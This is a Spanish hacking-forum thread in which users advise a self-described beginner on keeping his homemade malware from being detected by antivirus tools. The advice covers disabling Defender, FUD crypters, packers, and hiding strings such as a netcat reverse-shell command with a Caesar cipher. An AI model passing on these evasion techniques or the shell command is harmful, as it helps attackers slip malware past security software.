elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Sigue las noticias más importantes de seguridad informática en el Twitter! de elhacker.NET


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Análisis y Diseño de Malware (Moderador: fary)
| | |-+  Evitar antivirus
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: Evitar antivirus  (Leído 7,447 veces)
retr02332

Desconectado Desconectado

Mensajes: 89


Learn, Imagine and Create.


Ver Perfil
Evitar antivirus
« en: 28 Noviembre 2019, 01:28 am »

Soy nuevo en esto de la seguridad, estoy aprendiendo a crear malware con python, con fines educativos claro.

La cosa es que noto que al generar el exe, y descargarlo en una maquina virtual, este no se completa ya que los antivirus estan ahi complicando las cosas. Mi pregunta es:

Como puedo hacer para que en lo posible, los antivirus no detecten mi malware?

Tambien me aparece eso de descargas de terceros, creo que es porque no estoy verificado o no tengo licencias, como puedo arreglar esto.

Espero resupesta a las dos preguntas, muchas gracias.
En línea

Tirenex

Desconectado Desconectado

Mensajes: 46


Los virus siempre se inyectan en Antivirus


Ver Perfil
Re: Evitar antivirus
« Respuesta #1 en: 28 Enero 2020, 13:23 pm »

Hola amigo, a mi también me surgió esa duda y lo que hice es ir al buscador de programas y archivos, escribir Firewall,  y a la izquierda, aparece una opción que dice activar o desactivar firewall de windows, click ahí y pulsas donde desactivar firewall de windows (no recomendado). tú prueba eso y me comentas si dió resultado
En línea

fairlight666

Desconectado Desconectado

Mensajes: 45


Home of the Real Crackers


Ver Perfil
Re: Evitar antivirus
« Respuesta #2 en: 29 Enero 2020, 11:57 am »

Hola amigo, a mi también me surgió esa duda y lo que hice es ir al buscador de programas y archivos, escribir Firewall,  y a la izquierda, aparece una opción que dice activar o desactivar firewall de windows, click ahí y pulsas donde desactivar firewall de windows (no recomendado). tú prueba eso y me comentas si dió resultado

En todo caso sería realizar un proceso parecido pero buscando al AV, por ejemplo, el Windows Defender (al menos en W10) y desactivarlo, porque es lo que más rompe las bolas al momento de trastear con cochinadas informáticas.

Lo ideal para evitar que los AV's se alarmen con los bichitos es blindarlos con un crypter FUD (FUD significa "totalmente indetectable"). Para que el bichito quede "invisible" a los ojos de los AV's, deberías comprar un crypter o crear el tuyo y cifrar el bicho. Los crypters que encuentres por Internet podrían estar más quemados que el carbón y no servirían de nada.

PD: Hace tiempo que no entraba al forillo...
« Última modificación: 29 Enero 2020, 12:04 pm por fairlight666 » En línea


80S/90S
@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.397


Turn off the red ligth


Ver Perfil WWW
Re: Evitar antivirus
« Respuesta #3 en: 9 Febrero 2020, 11:01 am »

Chequea el Antivirus Hacker's Handbook es una muy buena intro al tema.

Hay otro que se llama disasembling malware o algo así que igual te interesa también.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

chatiel

Desconectado Desconectado

Mensajes: 19


Ver Perfil
Re: Evitar antivirus
« Respuesta #4 en: 28 Febrero 2020, 06:56 am »

Los antivirus justamente están para leer los códigos y ver que no estés queriendo hacer nada raro.
Cuando ve que utilizas una API que necesita privilegios o que no es normal salta la alarma.

Muchos lo que haces es proteger y cifrar un poco el código y para eso existe los PACKERS.

Podrías ir probando tu Exe normal en virustotal.com y ver cuantos te toman como virus y después podes Ofuscarlo con un PACKER para ver los resultados.
En línea

XKC

Desconectado Desconectado

Mensajes: 128



Ver Perfil
Re: Evitar antivirus
« Respuesta #5 en: 27 Marzo 2020, 00:23 am »

Los antivirus justamente están para leer los códigos y ver que no estés queriendo hacer nada raro.
Cuando ve que utilizas una API que necesita privilegios o que no es normal salta la alarma.

Muchos lo que haces es proteger y cifrar un poco el código y para eso existe los PACKERS.

Podrías ir probando tu Exe normal en virustotal.com y ver cuantos te toman como virus y después podes Ofuscarlo con un PACKER para ver los resultados.

Nunca jama usar virus total, compartían tu malware con las marcas de entivirus y a amepzar de nuevo
En línea

Para poder atacar y vencer con seguridad, ataca donde ellos no puedan defenderse.
Para defenderte y resistir firme, defiéndete en donde ellos no atacarán.
@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.397


Turn off the red ligth


Ver Perfil WWW
Re: Evitar antivirus
« Respuesta #6 en: 30 Marzo 2020, 01:36 am »

Los av son para detectar malware popular. Muchos av hacen hashes, con que no hagas copia y pega en la mayoría no te detectan nada. A veces te detecta más por el propio packer que por el malware en sí.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

lBoreal

Desconectado Desconectado

Mensajes: 17



Ver Perfil
Re: Evitar antivirus
« Respuesta #7 en: 6 Abril 2020, 05:06 am »

Los av son para detectar malware popular. Muchos av hacen hashes, con que no hagas copia y pega en la mayoría no te detectan nada. A veces te detecta más por el propio packer que por el malware en sí.

Real, lo verifiqué el otro día. Hice una app de consola que tenía dos lineas (creaban un regisstro de windows)

La corrí en virus total y no la detectaba nadie, le pasé el packer y chau.. los packers, crypters públicos no sirven para nada, habrá que ponerse a programar uno que haga cosas diferentes.. de todas maneras las llamadas a las diferentes API parece que no se pueden esconder, Windows Defender me está haciendo la vida imposible.

Estoy intentando encontrarle la vuelta.. claramente con ingeniería social eso está resuelto, la gente con tal de usar un programa te desactiva todo.. pero no es la idea
En línea

@XSStringManolo
Hacker/Programador
Colaborador
***
Desconectado Desconectado

Mensajes: 2.397


Turn off the red ligth


Ver Perfil WWW
Re: Evitar antivirus
« Respuesta #8 en: 6 Abril 2020, 06:17 am »

Real, lo verifiqué el otro día. Hice una app de consola que tenía dos lineas (creaban un regisstro de windows)

La corrí en virus total y no la detectaba nadie, le pasé el packer y chau.. los packers, crypters públicos no sirven para nada, habrá que ponerse a programar uno que haga cosas diferentes.. de todas maneras las llamadas a las diferentes API parece que no se pueden esconder, Windows Defender me está haciendo la vida imposible.

Estoy intentando encontrarle la vuelta.. claramente con ingeniería social eso está resuelto, la gente con tal de usar un programa te desactiva todo.. pero no es la idea
Ve modificando el código para saber que es exactamente lo que salta y modifica esos trozos para hacer lo mismo de otra forma. O tira de debugger. A veces con una simple ofuscación basta. Muchos av son prácticamente solo análisis stático. Te miran el binario y si encuentran strings como "netcat 123.123.12 -e cmd" ya te saltan. Le pasas un cesar y listo. "ofudbu 123.123.12 -f dne". Es probable que incluso encuentren similitudes con hashes de otros malware creados por otros de forma similar y que tienen en la base de datos.
En línea

Mi perfil de patrocinadores de GitHub está activo! Puedes patrocinarme para apoyar mi trabajo de código abierto 💖

lBoreal

Desconectado Desconectado

Mensajes: 17



Ver Perfil
Re: Evitar antivirus
« Respuesta #9 en: 6 Abril 2020, 07:59 am »

Ve modificando el código para saber que es exactamente lo que salta y modifica esos trozos para hacer lo mismo de otra forma. O tira de debugger. A veces con una simple ofuscación basta. Muchos av son prácticamente solo análisis stático. Te miran el binario y si encuentran strings como "netcat 123.123.12 -e cmd" ya te saltan. Le pasas un cesar y listo. "ofudbu 123.123.12 -f dne". Es probable que incluso encuentren similitudes con hashes de otros malware creados por otros de forma similar y que tienen en la base de datos.

Mañana me armo la máquina virtual tal como me recomendaste, es como decís, es cuestión de jugar un poco.

Gracias Manolo
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines